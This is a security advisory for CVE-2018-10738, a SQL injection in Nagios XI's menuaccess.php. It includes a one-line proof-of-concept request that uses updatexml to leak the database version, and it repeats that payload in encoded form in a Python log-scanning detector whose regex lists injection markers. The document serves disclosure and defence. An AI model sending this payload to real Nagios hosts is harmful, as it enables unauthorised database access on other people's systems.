NagiosXI <= 5.4.12 menuaccess.php... CVE-2018-10738 CNNVD-201805-491

CVSS score: 6.5
Published: 2018-05-16
Revised: 2018-06-15

### NagiosXI <= 5.4.12 menuaccess.php SQL injection (CVE-2018-10738)

#### Description

A SQL injection issue was discovered in Nagios XI via the `chbKey1` parameter of admin/menuaccess.php.

#### Affected Version

* Nagios XI 5.2.x
* Nagios XI 5.4.x before 5.4.13

#### Proof of concept

```
http://xxxx/nagiosql/admin/menuaccess.php
chbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1
```

![](https://images.seebug.org/1525859270765-w331s)

#### Fix

Upgrade to version 5.4.13.
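For hosts that cannot be upgraded immediately, the request shape in the proof of concept can be hunted for in web or WAF logs. The following is an added detection example, not code from Nagios XI or from this advisory; it assumes the log records expose the request path and the raw parameter string (query string or form body), and the marker list, function names and sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Path taken from the advisory's proof of concept.
TARGET_PATH = "/nagiosql/admin/menuaccess.php"
# The advisory names chbKey1; matching chbKey<N> is an assumption of this example.
KEY_PARAM = re.compile(r"^chbKey\d+$")
# SQL syntax that has no place in a checkbox key (assumed benign values are plain tokens).
SQLI_MARKERS = re.compile(
    r"['\"`;#]|--|/\*|\b(updatexml|extractvalue|union|select|sleep|benchmark|concat)\b",
    re.IGNORECASE,
)

def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(path, params):
    """Return [(name, decoded_value)] for chbKeyN parameters carrying SQL syntax."""
    if not path.split("?", 1)[0].endswith(TARGET_PATH):
        return []
    hits = []
    # parse_qsl performs the first round of URL decoding on names and values.
    for name, value in parse_qsl(params, keep_blank_values=True):
        value = fully_decode(value)
        if KEY_PARAM.match(name) and SQLI_MARKERS.search(value):
            hits.append((name, value))
    return hits

# Constructed sample records (path, parameter string); not real traffic.
SAMPLE_REQUESTS = [
    (TARGET_PATH, "chbKey1=1&selSubMenu=1&subSave=1"),
    (TARGET_PATH, "chbKey1=%27+or+updatexml%282%2Cconcat%280x7e%2C%28version"
                  "%28%29%29%29%2C0%29+or%27%27%23&selSubMenu=1&subSave=1"),
    (TARGET_PATH, "chbKey1=1%2527%2520or%25201&selSubMenu=1"),  # double-encoded
    ("/nagiosql/admin/other.php", "chbKey1=%27"),  # different script, ignored
]

def scan(records):
    """Return [(record_index, hits)] for every record with at least one hit."""
    return [(i, h) for i, (p, q) in enumerate(records) if (h := suspicious_params(p, q))]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS):
        print(index, hits)
```

A hit is a lead for investigation rather than proof of compromise; the fix remains the upgrade to 5.4.13.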
